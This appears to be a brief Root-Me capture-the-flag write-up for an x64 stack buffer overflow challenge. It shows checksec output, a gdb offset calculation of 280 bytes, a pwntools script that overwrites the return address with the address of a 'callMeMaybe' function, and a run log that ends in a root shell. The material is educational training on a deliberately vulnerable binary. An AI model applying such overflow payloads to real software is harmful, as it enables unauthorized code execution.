root-me:x64 stack overflow basic
x64 stack overflow basic
step
checksec:
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
use the address of callMeMaybe to cover the return address of strlen
calc the distance:
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000400728 in main ()
gdb-peda$ pattern_offset A%JA%fA%5A
A%JA%fA%5A found at offset: 280
exploit
from pwn import *
p = process('./ch35')
elf = ELF('ch35')
sh = elf.symbols['callMeMaybe']
payload = 'a'*280 + p64(sh)
print payload
p.sendline(payload)
p.interactive()
run it:
⚡ root@pwn /mnt/hgfs/pwnexc/root-me/x64 stack overflow basic python exp_ch35.py
[+] Starting local process './ch35': pid 4337
[*] '/mnt/hgfs/pwnexc/root-me/x64 stack overflow basic/ch35'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x96\x06@\x00\x00\x00\x00\x00
[*] Switching to interactive mode
Hello aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1b
$ id
uid=0(root) gid=0(root) 组=0(root)
$